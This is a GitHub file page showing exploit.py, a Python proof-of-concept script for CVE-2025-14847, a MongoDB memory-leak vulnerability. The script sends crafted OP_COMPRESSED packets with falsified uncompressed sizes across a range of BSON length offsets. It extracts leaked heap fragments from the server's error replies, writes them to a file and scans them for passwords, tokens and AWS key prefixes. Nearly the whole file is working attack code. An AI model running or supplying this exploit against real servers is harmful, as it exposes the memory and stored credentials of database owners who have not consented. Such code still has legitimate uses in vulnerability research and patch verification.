-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathexploit.py
More file actions
161 lines (129 loc) · 5.85 KB
/
exploit.py
File metadata and controls
161 lines (129 loc) · 5.85 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
import argparse
import random
import re
import socket
import struct
import zlib

import slogsec
log = slogsec.get_logger("CVE-2025-14847")
def hexdump(data, length=16):
    """Log *data* as a classic hex/ASCII dump, *length* bytes per row."""
    log.info(f"{'Offset':<10} {'Hex':<47} {'ASCII'}")
    log.info("-" * 75)
    for offset in range(0, len(data), length):
        row = data[offset:offset + length]
        hex_col = " ".join(f"{byte:02x}" for byte in row)
        # Printable ASCII (0x20-0x7e) shown verbatim, everything else as '.'
        text_col = "".join(chr(byte) if 32 <= byte <= 126 else "." for byte in row)
        log.info(f"{offset:08x}: {hex_col:<47} |{text_col}|")
def build_malformed_packet(leak_size):
    """Construct a malicious OP_COMPRESSED packet.

    Args:
        leak_size: value advertised as the uncompressed payload size. A
            vulnerable server allocates a buffer of this size while the
            actual inflated data is tiny, so the remainder of the buffer
            is returned uninitialized.

    Returns:
        Tuple ``(packet, request_id)`` — the complete wire message
        (16-byte MsgHeader + OP_COMPRESSED body) and its random requestID.
    """
    # 1. Prepare a valid original payload (OP_QUERY protocol)
    # Query: {"isMaster": 1}
    bson_payload = b'\x13\x00\x00\x00\x10isMaster\x00\x01\x00\x00\x00\x00'
    # OP_QUERY Header: flags(0) + collection("admin.$cmd") + nToSkip(0) + nToReturn(-1)
    op_query_header = struct.pack('<I', 0) + b'admin.$cmd\x00' + struct.pack('<ii', 0, -1)
    original_msg = op_query_header + bson_payload
    # 2. Normal compression of the original message
    compressed_body = zlib.compress(original_msg)
    # 3. Construct malicious OP_COMPRESSED fields.
    # Vulnerability core: the declared uncompressed size is a huge value;
    # the server allocates based on it, but the real data is small.
    op_compressed_data = (
        struct.pack('<I', 2004) +       # originalOpcode: 2004 (OP_QUERY)
        struct.pack('<I', leak_size) +  # MALICIOUS: declared decompressed length
        b'\x02' +                       # compressorId: 2 (zlib)
        compressed_body                 # actual compressed data
    )
    # 4. Standard 16-byte MsgHeader: messageLength, requestID, responseTo, opCode.
    # BUG FIX: `random` was used here without ever being imported (NameError);
    # it is now imported at the top of the file.
    request_id = random.randint(1000, 9999)
    op_code = 2012  # 2012 represents OP_COMPRESSED
    total_len = 16 + len(op_compressed_data)
    header = struct.pack('<iiii', total_len, request_id, 0, op_code)
    return header + op_compressed_data, request_id
def send_probe(host, port, doc_len, buffer_size):
    """Send crafted BSON with inflated document length.

    Args:
        host, port: target endpoint.
        doc_len: the (lying) int32 total-length prefix of the BSON document.
        buffer_size: claimed uncompressed size in the OP_COMPRESSED envelope.

    Returns:
        The raw server response bytes, or ``b''`` on any network failure.
    """
    # Minimal BSON content - we lie about total length
    content = b'\x10a\x00\x01\x00\x00\x00'  # int32 a=1
    bson = struct.pack('<i', doc_len) + content
    # Wrap in OP_MSG: flagBits(0) + section kind byte 0 + body document
    op_msg = struct.pack('<I', 0) + b'\x00' + bson
    compressed = zlib.compress(op_msg)
    # OP_COMPRESSED with inflated buffer size (triggers the bug)
    payload = struct.pack('<I', 2013)         # original opcode (OP_MSG)
    payload += struct.pack('<i', buffer_size) # claimed uncompressed size
    payload += struct.pack('B', 2)            # zlib
    payload += compressed
    header = struct.pack('<IIII', 16 + len(payload), 1, 0, 2012)
    try:
        # BUG FIX: `with` guarantees the socket is closed on every path;
        # the original leaked the fd whenever connect/send/recv raised.
        with socket.socket() as sock:
            sock.settimeout(2)
            sock.connect((host, port))
            sock.sendall(header + payload)
            response = b''
            # Keep reading until the length prefix says the message is complete.
            while len(response) < 4 or len(response) < struct.unpack('<I', response[:4])[0]:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                response += chunk
            return response
    except OSError:
        # BUG FIX: narrowed from a bare `except:` that also swallowed
        # KeyboardInterrupt/SystemExit. OSError covers all socket errors
        # and timeouts; failure is reported as an empty response.
        return b''
def extract_leaks(response):
    """Extract leaked data fragments from a server error response.

    Args:
        response: raw wire-protocol reply (MsgHeader + body). Replies with
            opcode 2012 (OP_COMPRESSED) are zlib-inflated first.

    Returns:
        List of leaked byte fragments: BSON field names echoed back in
        parse errors, plus single type bytes from "unrecognized type" errors.
        Empty list when the response is too short or unparseable.
    """
    # 16-byte header + 9 bytes of compression fields is the minimum useful size
    if len(response) < 25:
        return []
    try:
        msg_len = struct.unpack('<I', response[:4])[0]
        if struct.unpack('<I', response[12:16])[0] == 2012:
            # Compressed reply: payload starts after header(16) + opcode(4)
            # + uncompressedSize(4) + compressorId(1) = offset 25.
            raw = zlib.decompress(response[25:msg_len])
        else:
            raw = response[16:msg_len]
    except (struct.error, zlib.error):
        # BUG FIX: narrowed from a bare `except:` — malformed replies are
        # expected here, but unrelated errors should not be hidden.
        return []
    leaks = []
    # Field names from BSON errors; skip the names we sent ourselves.
    for match in re.finditer(rb"field name '([^']*)'", raw):
        data = match.group(1)
        if data and data not in [b'?', b'a', b'$db', b'ping']:
            leaks.append(data)
    # Type bytes from unrecognized type errors
    for match in re.finditer(rb"type (\d+)", raw):
        leaks.append(bytes([int(match.group(1)) & 0xFF]))
    return leaks
def main():
    """Scan a MongoDB endpoint for leaked heap fragments and save them."""
    parser = argparse.ArgumentParser(description='CVE-2025-14847 MongoDB Memory Leak')
    parser.add_argument('--host', default='localhost', help='Target host')
    parser.add_argument('--port', type=int, default=27017, help='Target port')
    parser.add_argument('--min-offset', type=int, default=20, help='Min doc length')
    parser.add_argument('--max-offset', type=int, default=8192, help='Max doc length')
    parser.add_argument('--output', default='leaked.bin', help='Output file')
    args = parser.parse_args()
    log.info(f"[*] Target: {args.host}:{args.port}")
    log.info(f"[*] Scanning offsets {args.min_offset}-{args.max_offset}")
    all_leaked = bytearray()
    unique_leaks = set()
    for doc_len in range(args.min_offset, args.max_offset):
        response = send_probe(args.host, args.port, doc_len, doc_len + 500)
        for data in extract_leaks(response):
            if data not in unique_leaks:
                unique_leaks.add(data)
                all_leaked.extend(data)
                # Show interesting leaks (> 10 bytes)
                if len(data) > 10:
                    # BUG FIX: the label line (ending in ':') was logged
                    # *after* the hexdump it introduces; emit it first.
                    log.info(f"[+] offset={doc_len:4d} len={len(data):4d}:")
                    hexdump(data[:80], length=16)
    # Save results
    with open(args.output, 'wb') as f:
        f.write(all_leaked)
    log.success(f"[*] Total leaked: {len(all_leaked)} bytes")
    log.success(f"[*] Unique fragments: {len(unique_leaks)}")
    log.success(f"[*] Saved to: {args.output}")
    # Flag credential-looking patterns (case-insensitive substring search)
    secrets = [b'password', b'secret', b'key', b'token', b'admin', b'AKIA']
    for s in secrets:
        if s.lower() in all_leaked.lower():
            # CONSISTENCY FIX: was a bare print() amid slogsec logging
            log.info(f"[!] Found pattern: {s.decode()}")
# Script entry point: run the scanner only when executed directly,
# not when imported as a module.
if __name__ == '__main__':
    main()